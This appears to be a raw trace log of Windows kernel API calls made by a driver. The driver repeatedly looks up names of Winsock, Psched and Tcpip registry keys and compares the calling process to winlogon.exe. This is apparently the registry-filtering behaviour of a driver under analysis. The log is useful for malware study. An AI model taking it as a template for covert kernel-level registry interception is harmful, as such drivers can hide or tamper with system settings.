| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x96, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x96, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x96, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x96, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Psched\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc4, ret_val_ptr_out = 0xffffe0003a782f30 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc2, ret_val_ptr_out = 0xffffe0003a782e50 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xc2, ObjectNameInfo_unk_out = 0xffffe0003a782e50, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Setup Migration\Providers\Psched, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Setup Migration\Providers\Psched | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782e50, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc2, ret_val_ptr_out = 0xffffe0003a782f30 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xc0, ObjectNameInfo_unk_out = 0xffffe0003a76e520, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
